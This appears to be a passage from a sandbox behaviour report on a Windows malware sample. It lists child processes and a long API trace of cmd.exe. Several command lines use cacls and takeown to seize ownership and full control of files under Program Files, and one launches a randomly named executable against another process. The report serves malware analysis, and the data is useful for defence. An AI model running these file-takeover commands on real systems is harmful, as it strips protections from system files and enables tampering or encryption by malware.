cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 687 os_tid = 0x64 Process: id = "168" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x305cd000" os_pid = "0x5b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "156" os_parent_pid = "0x710" cmd_line = "cacls \"C:\\Program Files\\Windows Mail\\wabmig.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 688 os_tid = 0xb18 Process: id = "169" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x30975000" os_pid = "0x708" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "145" os_parent_pid = "0x6f4" cmd_line = "takeown /F \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 689 os_tid = 0x72c Thread: id = 696 os_tid = 0xab0 Process: id = "170" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x311a1000" os_pid = "0x798" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "140" os_parent_pid = "0x24c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"spcwin.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 690 os_tid = 0xac4 [0174.664] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ffa74 | out: lpSystemTimeAsFileTime=0x2ffa74*(dwLowDateTime=0x21acf820, dwHighDateTime=0x1d68287)) [0174.664] GetCurrentProcessId () returned 0x798 [0174.664] GetCurrentThreadId () returned 0xac4 [0174.664] GetTickCount () returned 0x115867f [0174.664] QueryPerformanceCounter (in: lpPerformanceCount=0x2ffa6c | out: lpPerformanceCount=0x2ffa6c*=29500346576) returned 1 [0174.666] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0174.681] __set_app_type (_Type=0x1) [0174.681] __p__fmode () returned 0x770331f4 [0174.681] __p__commode () returned 0x770331fc [0174.681] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0174.681] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0174.681] GetCurrentThreadId () returned 0xac4 [0174.681] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xac4) returned 0x60 [0174.681] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0174.682] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0174.682] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.682] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0174.682] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ffa04 | out: phkResult=0x2ffa04*=0x0) returned 0x2 [0174.682] VirtualQuery (in: lpAddress=0x2ffa3b, lpBuffer=0x2ff9d4, dwLength=0x1c | out: lpBuffer=0x2ff9d4*(BaseAddress=0x2ff000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.682] VirtualQuery (in: lpAddress=0x200000, lpBuffer=0x2ff9d4, dwLength=0x1c | out: lpBuffer=0x2ff9d4*(BaseAddress=0x200000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0174.683] VirtualQuery (in: lpAddress=0x201000, lpBuffer=0x2ff9d4, dwLength=0x1c | out: lpBuffer=0x2ff9d4*(BaseAddress=0x201000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0174.683] VirtualQuery (in: lpAddress=0x203000, lpBuffer=0x2ff9d4, dwLength=0x1c | out: lpBuffer=0x2ff9d4*(BaseAddress=0x203000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.683] VirtualQuery (in: lpAddress=0x300000, lpBuffer=0x2ff9d4, dwLength=0x1c | out: lpBuffer=0x2ff9d4*(BaseAddress=0x300000, AllocationBase=0x300000, AllocationProtect=0x2, RegionSize=0x5000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0174.683] GetConsoleOutputCP () returned 0x1b5 [0174.683] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0174.683] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0174.684] _get_osfhandle (_FileHandle=1) returned 0x80 [0174.684] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0174.684] _get_osfhandle (_FileHandle=1) returned 0x80 [0174.684] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0174.684] _get_osfhandle (_FileHandle=0) returned 0x3 [0174.684] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0174.685] GetEnvironmentStringsW () returned 0x6b21d0* [0174.685] GetProcessHeap () returned 0x6a0000 [0174.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xb7c) returned 0x6b2d58 [0174.685] FreeEnvironmentStringsW (penv=0x6b21d0) returned 1 [0174.685] GetProcessHeap () returned 0x6a0000 [0174.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x4) returned 0x6b18b0 [0174.685] GetEnvironmentStringsW () returned 0x6b21d0* [0174.686] GetProcessHeap () returned 0x6a0000 [0174.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xb7c) returned 0x6b38e0 [0174.686] FreeEnvironmentStringsW (penv=0x6b21d0) returned 1 [0174.686] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2fe974 | out: phkResult=0x2fe974*=0x68) returned 0x0 [0174.686] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2fe97c, lpData=0x2fe980, lpcbData=0x2fe978*=0x1000 | out: lpType=0x2fe97c*=0x0, lpData=0x2fe980*=0x0, lpcbData=0x2fe978*=0x1000) returned 0x2 [0174.686] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2fe97c, lpData=0x2fe980, lpcbData=0x2fe978*=0x1000 | out: lpType=0x2fe97c*=0x4, lpData=0x2fe980*=0x1, lpcbData=0x2fe978*=0x4) returned 0x0 [0174.687] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2fe97c, lpData=0x2fe980, lpcbData=0x2fe978*=0x1000 | out: lpType=0x2fe97c*=0x0, lpData=0x2fe980*=0x1, lpcbData=0x2fe978*=0x1000) returned 0x2 [0174.687] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2fe97c, lpData=0x2fe980, lpcbData=0x2fe978*=0x1000 | out: lpType=0x2fe97c*=0x4, lpData=0x2fe980*=0x0, lpcbData=0x2fe978*=0x4) returned 0x0 [0174.687] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2fe97c, lpData=0x2fe980, lpcbData=0x2fe978*=0x1000 | out: lpType=0x2fe97c*=0x4, lpData=0x2fe980*=0x40, lpcbData=0x2fe978*=0x4) returned 0x0 [0174.687] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2fe97c, lpData=0x2fe980, lpcbData=0x2fe978*=0x1000 | out: lpType=0x2fe97c*=0x4, lpData=0x2fe980*=0x40, lpcbData=0x2fe978*=0x4) returned 0x0 [0174.687] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2fe97c, lpData=0x2fe980, lpcbData=0x2fe978*=0x1000 | out: lpType=0x2fe97c*=0x0, lpData=0x2fe980*=0x40, lpcbData=0x2fe978*=0x1000) returned 0x2 [0174.687] RegCloseKey (hKey=0x68) returned 0x0 [0174.687] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2fe974 | out: phkResult=0x2fe974*=0x68) returned 0x0 [0174.687] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2fe97c, lpData=0x2fe980, lpcbData=0x2fe978*=0x1000 | out: lpType=0x2fe97c*=0x0, lpData=0x2fe980*=0x40, lpcbData=0x2fe978*=0x1000) returned 0x2 [0174.687] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2fe97c, lpData=0x2fe980, lpcbData=0x2fe978*=0x1000 | out: lpType=0x2fe97c*=0x4, lpData=0x2fe980*=0x1, lpcbData=0x2fe978*=0x4) returned 0x0 [0174.688] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2fe97c, lpData=0x2fe980, lpcbData=0x2fe978*=0x1000 | out: lpType=0x2fe97c*=0x0, lpData=0x2fe980*=0x1, lpcbData=0x2fe978*=0x1000) returned 0x2 [0174.688] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2fe97c, lpData=0x2fe980, lpcbData=0x2fe978*=0x1000 | out: lpType=0x2fe97c*=0x4, lpData=0x2fe980*=0x0, lpcbData=0x2fe978*=0x4) returned 0x0 [0174.688] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2fe97c, lpData=0x2fe980, lpcbData=0x2fe978*=0x1000 | out: lpType=0x2fe97c*=0x4, lpData=0x2fe980*=0x9, lpcbData=0x2fe978*=0x4) returned 0x0 [0174.688] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2fe97c, lpData=0x2fe980, lpcbData=0x2fe978*=0x1000 | out: lpType=0x2fe97c*=0x4, lpData=0x2fe980*=0x9, lpcbData=0x2fe978*=0x4) returned 0x0 [0174.688] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2fe97c, lpData=0x2fe980, lpcbData=0x2fe978*=0x1000 | out: lpType=0x2fe97c*=0x0, lpData=0x2fe980*=0x9, lpcbData=0x2fe978*=0x1000) returned 0x2 [0174.688] RegCloseKey (hKey=0x68) returned 0x0 [0174.688] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2cb [0174.688] srand (_Seed=0x5f51e2cb) [0174.688] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"spcwin.exe\" -nobanner" [0174.688] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"spcwin.exe\" -nobanner" [0174.689] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0174.690] GetProcessHeap () returned 0x6a0000 [0174.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x210) returned 0x6b4468 [0174.690] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6b4470, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0174.690] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0174.690] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0174.690] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0174.690] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.690] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0174.690] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0174.690] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0174.690] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0174.690] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0174.690] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0174.690] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0174.690] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0174.691] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0174.691] GetProcessHeap () returned 0x6a0000 [0174.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x54) returned 0x6b4680 [0174.691] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ff740 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0174.691] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2ff740, lpFilePart=0x2ff73c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ff73c*="Desktop") returned 0x25 [0174.691] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0174.691] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ff4bc | out: lpFindFileData=0x2ff4bc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6b2050 [0174.691] FindClose (in: hFindFile=0x6b2050 | out: hFindFile=0x6b2050) returned 1 [0174.691] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ff4bc | out: lpFindFileData=0x2ff4bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6b2050 [0174.691] FindClose (in: hFindFile=0x6b2050 | out: hFindFile=0x6b2050) returned 1 [0174.691] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0174.691] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ff4bc | out: lpFindFileData=0x2ff4bc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6b2050 [0174.692] FindClose (in: hFindFile=0x6b2050 | out: hFindFile=0x6b2050) returned 1 [0174.692] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0174.692] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0174.692] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0174.692] GetProcessHeap () returned 0x6a0000 [0174.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b2d58 | out: hHeap=0x6a0000) returned 1 [0174.692] GetEnvironmentStringsW () returned 0x6b21d0* [0174.692] GetProcessHeap () returned 0x6a0000 [0174.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xb7c) returned 0x6b2d58 [0174.692] FreeEnvironmentStringsW (penv=0x6b21d0) returned 1 [0174.692] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0174.692] GetProcessHeap () returned 0x6a0000 [0174.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4680 | out: hHeap=0x6a0000) returned 1 [0174.692] GetProcessHeap () returned 0x6a0000 [0174.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x400e) returned 0x6b4ee0 [0174.693] GetProcessHeap () returned 0x6a0000 [0174.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x6c) returned 0x6b21d0 [0174.693] GetProcessHeap () returned 0x6a0000 [0174.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4ee0 | out: hHeap=0x6a0000) returned 1 [0174.693] GetConsoleOutputCP () returned 0x1b5 [0174.693] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0174.693] GetUserDefaultLCID () returned 0x409 [0174.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0174.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ff880, cchData=128 | out: lpLCData="0") returned 2 [0174.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ff880, cchData=128 | out: lpLCData="0") returned 2 [0174.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ff880, cchData=128 | out: lpLCData="1") returned 2 [0174.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0174.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0174.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0174.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0174.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0174.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0174.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0174.695] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0174.695] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0174.695] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0174.695] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0174.697] GetProcessHeap () returned 0x6a0000 [0174.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20c) returned 0x6b2248 [0174.697] GetConsoleTitleW (in: lpConsoleTitle=0x6b2248, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.697] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0174.697] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0174.697] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0174.697] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0174.698] GetProcessHeap () returned 0x6a0000 [0174.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x400a) returned 0x6b4ee0 [0174.698] GetProcessHeap () returned 0x6a0000 [0174.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4ee0 | out: hHeap=0x6a0000) returned 1 [0174.701] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0174.701] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0174.701] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0174.701] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0174.701] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0174.701] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0174.701] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0174.701] GetProcessHeap () returned 0x6a0000 [0174.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x58) returned 0x6b4680 [0174.701] GetProcessHeap () returned 0x6a0000 [0174.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x22) returned 0x6b2460 [0175.482] GetProcessHeap () returned 0x6a0000 [0175.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x50) returned 0x6b2490 [0175.483] GetConsoleTitleW (in: lpConsoleTitle=0x2ff578, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.485] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0175.485] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0175.485] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0175.485] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0175.485] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0175.485] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0175.485] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0175.485] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0175.485] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0175.485] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0175.485] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0175.485] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0175.485] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0175.485] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0175.485] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0175.485] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0175.486] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0175.486] 